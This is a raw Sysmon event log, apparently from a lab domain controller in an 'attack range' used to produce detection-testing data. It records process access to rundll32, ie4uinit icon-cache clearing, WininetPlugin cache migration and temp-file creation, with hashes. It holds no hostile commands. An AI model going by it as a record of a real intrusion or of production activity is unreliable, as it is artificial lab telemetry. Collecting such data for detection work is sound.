12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.204{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.204{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.204{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64CA-6064-AD00-00000000AE01}45364280C:\Windows\System32\ie4uinit.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+176c|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.202{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 10341000x80000000000000005744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64CA-6064-AD00-00000000AE01}45364280C:\Windows\System32\ie4uinit.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+1743|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.200{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 11241100x80000000000000005737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\container.dat2021-03-31 12:02:19.189 11241100x80000000000000005736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.064{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\counters.dat2021-03-31 12:02:19.049 10341000x80000000000000005735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.033{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.033{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000005779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.777{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt2021-03-31 10:51:18.799 23542300x80000000000000005778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.777{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txtMD5=9902BAEDC06FA4A8681E696EE6C73C06,SHA256=D0628FA63102EE74053BC6EFDD297AED794848F5DC300DAA7E391F4CF04E8511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.730{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.bakMD5=840DF767CAC9367CBBFD774EF011EAF3,SHA256=B2BAC5F3DE47D5C7ACDC0F8AFC4FFD4740260880C0A0CF4E4383495AB1AA98DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.699{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9B94.tmpMD5=A828B8C496779BDB61FCE06BA0D57C39,SHA256=C952F470A428D5D61ED52FB05C0143258687081E1AD13CFE6FF58037B375364D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.621{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12BE81463E0D543477479E48444FCFA8,SHA256=202966D11E3A39730CE966EFAD5765208657903E2282ED2024623D5F71AC6C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.544{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9B94.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.310{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.310{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.310{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI99DD.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.108{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI99DD.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.108{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI997F.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.014{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI997F.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.014{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9920.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 